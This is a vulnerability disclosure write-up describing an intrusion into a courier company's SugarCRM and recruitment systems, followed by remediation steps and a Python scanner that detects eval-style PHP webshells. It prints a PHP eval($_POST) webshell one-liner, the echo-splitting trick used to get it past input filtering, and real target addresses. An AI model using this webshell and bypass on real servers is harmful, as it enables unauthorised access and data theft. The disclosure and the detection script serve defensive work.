This is actually a collection of vulnerabilities, including PHP code execution and information leakage, which together lead to webshell access.
1. DNS zone transfer vulnerability
2. PHP code execution vulnerability
Fed the collated IP addresses into Nmap and found several risky systems.
Address: http://219.134.187.130:8085/index.php?module=Users&action=Login
The weak password admin/admin gets into the admin backend.
After logging in, we found that the SugarCRM version was 6.2.3, so we used the latest exploit (user authentication required).
CVE number: CVE-2012-0694 SugarCRM CE <= 6.3.1 "unserialize()" PHP Code Execution
So we got a reverse shell.
There was a hiccup before getting the webshell: we found that the wget command was not usable; it seems the firewall blocked outbound connections from the server. The touch command could be used, but vi could not; only echo worked. So create a 1.php file with touch and write to it with echo.
touch 1.php
echo "<?php eval($_POST[cmd])?>" > 1.php
However, each time the file was written, the $_POST part was filtered out.
So I thought of using the splitting trick from XSS (see gainover's writeup at http://www.wooyun.org/bugs/wooyun-2012-07854, haha).
First line:
echo -n "<?php eval($" > 1.php
Second line:
echo -n "_POST[cmd])?>" > 1.php
Then connect with China Chopper and upload the webshell.
Webshell address: http://219.134.187.130:8085/shell.php
Not deleted yet.
Database information
After cracking the MD5 hashes, log into the recruitment website's backend.
3. Information leakage, including details of the Oracle database.
http://uatmobile.sf-express.com/SFMobile.xml
Solution:
1. Change the SugarCRM password.
2. Delete the file http://uatmobile.sf-express.com/SFMobile.xml.
3. Delete the webshell http://219.134.187.130:8085/shell.php.
4. Stop the service if it is not in use, and separate the database from the application.
Any gifts? Haha, it seems SF doesn't charge delivery fees on gifts.
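Step 3 above only removes the one shell that was found. A defender cleaning up after this kind of intrusion wants a repeatable check for the whole web root. The script below is an added example, not part of the original report: it flags PHP files that eval() a request superglobal (the one-liner written with echo above) and, separately, any PHP file modified after the last known deployment, which catches a dropped shell even when its content is obfuscated. The web root, file names and timestamps in demo() are constructed.

```python
import os
import re
import tempfile
from pathlib import Path

# Pattern for the one-line webshell in the report: eval() fed directly from a
# request superglobal. \s* tolerates odd spacing in files assembled with echo.
WEBSHELL_RE = re.compile(r"eval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\s*\[", re.I)


def is_eval_webshell(src: str) -> bool:
    """True if the PHP source evaluates a request variable directly."""
    return WEBSHELL_RE.search(src) is not None


def scan_webroot(root: Path, baseline_mtime: float) -> dict:
    """Scan *.php under root.

    Returns {'webshell': [...], 'new_files': [...]} with file names that
    match WEBSHELL_RE and file names modified after baseline_mtime (the
    last known deployment time), respectively.
    """
    found = {"webshell": [], "new_files": []}
    for path in sorted(root.rglob("*.php")):
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip, do not abort the sweep
        if is_eval_webshell(text):
            found["webshell"].append(path.name)
        if path.stat().st_mtime > baseline_mtime:
            found["new_files"].append(path.name)
    return found


def demo() -> dict:
    """Constructed web root: one legitimate file and one dropped shell (hypothetical)."""
    root = Path(tempfile.mkdtemp())
    baseline = 1_700_000_000.0  # constructed "last deployment" timestamp
    index = root / "index.php"
    index.write_text("<?php echo 'login'; ?>")
    os.utime(index, (baseline - 86400, baseline - 86400))  # predates deployment
    shell = root / "shell.php"
    shell.write_text("<?php eval($_POST[cmd])?>")
    os.utime(shell, (baseline + 3600, baseline + 3600))  # written after deployment
    return scan_webroot(root, baseline)


if __name__ == "__main__":
    print(demo())
```

On a real host, replace demo() with the actual document root and the deployment time from your release records; files that are new but do not match the pattern still deserve a manual look.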